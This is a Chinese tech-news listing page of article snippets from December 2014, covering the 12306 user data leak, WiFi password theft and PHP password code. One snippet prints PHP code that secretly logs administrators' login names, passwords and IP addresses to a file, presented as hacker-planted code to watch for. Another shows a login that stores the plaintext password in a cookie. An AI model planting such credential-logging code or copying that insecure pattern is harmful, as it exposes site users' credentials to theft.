-
严重了!12306用户密码泄漏事件升级
站长搜索(www.adminso.com):严重了!12306用户密码泄漏事件升级 站长搜索讯 今日,乌云曝出了12306用户隐私被泄露事件,大量12306用户名和明文密码在网上疯传,随后12306发布声明称漏洞并非来自12306自己,而是第三方网站。随后,乌云也表示可能和12306网站没有关系...
业界动态 2014-12-26 11:57:06 -
不关我事! 12306密码大量泄露,抢票软件
站长搜索(www.adminso.com):12306密码大量泄露,抢票软件:不关我事! 站长搜索讯 今日上午,乌云漏洞报告平台上出现了一个关于12306的漏洞曝光,危害等级为“高”。这个漏洞将导致12306用户的账号、明文密码、身份证和注册邮箱这些敏感信息的泄露...
业界动态 2014-12-26 08:06:05 -
大量12306用户数据泄露 快改密码
站长搜索(www.adminso.com):快改密码:大量12306用户数据泄露 站长搜索讯 12月25日消息,今天乌云平台白帽子发布消息,大量12306用户数据在互联网疯传,其中包括用户帐号、明文密码、身份证邮箱等。漏洞作者“追寻”称,目前有大量12306用户(包括漏洞作者本人)的数据在网络上传播售卖...
业界动态 2014-12-25 21:51:08 -
12306事件:不改密码或遭退票
#12306密码外泄#【不改密码 可能被恶意退票!】技术人员提示,12306用户要尽快修改密码,避免已经订到的火车票被恶意退票。另外如果有其他重要账号使用了和12306相同的注册邮箱和密码,也应尽快修改密码,以免遭遇盗号风险...
互联网 2014-12-25 20:51:08 -
网曝12306用户数据遭泄露 含身份证及密码信息
站长搜索科技讯 12月25日消息,漏洞报告平台乌云漏洞今日发布报告称,大量12306用户数据在互联网疯传,包括用户帐号、明文密码、身份证邮箱等,导致用户资料大量泄漏。漏洞报告者称:“过年了,好多黑产牛不要命了,刚才看到12306的数据在传播,竟然连我自己的敏感数据都有...
互联网 2014-12-25 19:03:09 -
php实现的一个简单的网页密码登陆示例
本文是一个php实现的一个简单的网页密码登陆示例,感兴趣的同学参考下. <?php $password = "1234"; // 这里是密码 $p = ""; if(isset($_COOKIE["isview"]) and $_COOKIE["isview"] == $password){ $isview = true; }else{ if(isset($_POST["pwd"])){ if($_POST["pwd"] == $password){ setcookie("isview",$_POST["pwd"],time()+3600*3); $isview = true; }else{ $p = (empty($_POST["pwd"])) ? "需要密码才能查看,请输入密码。" : "密码不正确,请重新输入...
PHP 2014-12-22 06:51:03 -
PHP生成随机用户名和密码的实现代码
本文是一个PHP生成随机用户名和密码的实现代码,感兴趣的同学参考下。 使用PHP生成随机数可以应用在许多地方,比如可以设计程序的随机密码、模拟掷骰子游戏的应用程序、石头剪子布游戏应用程序等等 有时候我们需要在应用程序中使用随机生成用户名和密码,这样可以大大提高应用程序的安全,在PHP中生成随机用户名和密码可以使用 mt_rand 函数或者是 rand 函数, rand 函数在验证码中的应用多一些,而生成长字符的随机码一般都需要 mt_rand 函数...
PHP 2014-12-19 09:06:08 -
陈大年:WiFi万能钥匙将连接O2O服务商与用户
站长搜索科技讯 12月18日消息 连尚网络2014“WiFi万能钥匙・O2O”活动在北京举行,连尚网络创始人、CEO陈大年表示,“做WiFi万能钥匙的初衷是希望每个人都能享受免费上网。”陈大年在公开演讲中表示,“现在,WiFi万能钥匙已经做到了,让更多人免费上网,为更多人创造机会,这是极具意义,且非常值得高兴的事...
互联网 2014-12-18 18:39:02 -
PHP生成随机密码类示例分享
本文为大家提供的是一个PHP生成随机密码类分享,生成的密码包含大小写英文字母及数字,需要的朋友可以参考下 类代码: <?php /** * PHP - Password Generator Class * Version 1.0...
PHP 2014-12-18 01:09:06 -
php截取后台登陆密码的代码
本文是一个php截取后台登陆密码的代码,感兴趣的同学参考研究下. php截取后台登陆密码的代码,很多时候黑客留了这样的代码,大家一定要注意下 if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮 $sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 连起来赋值给变量$sb fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件 下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单...
PHP 2014-12-16 12:51:07 -
小心!你的WiFi密码可能已经被盗了
站长搜索(www.adminso.com):小心!你的WiFi密码可能已经被盗了 上海某科技有限公司开发了一款免费Wi-Fi热点软件,成为不少“网虫”追捧的蹭网神器。不过,“蹭网神器”蹭别人的同时,自己也被黑客盯上了...
业界动态 2014-12-14 19:24:08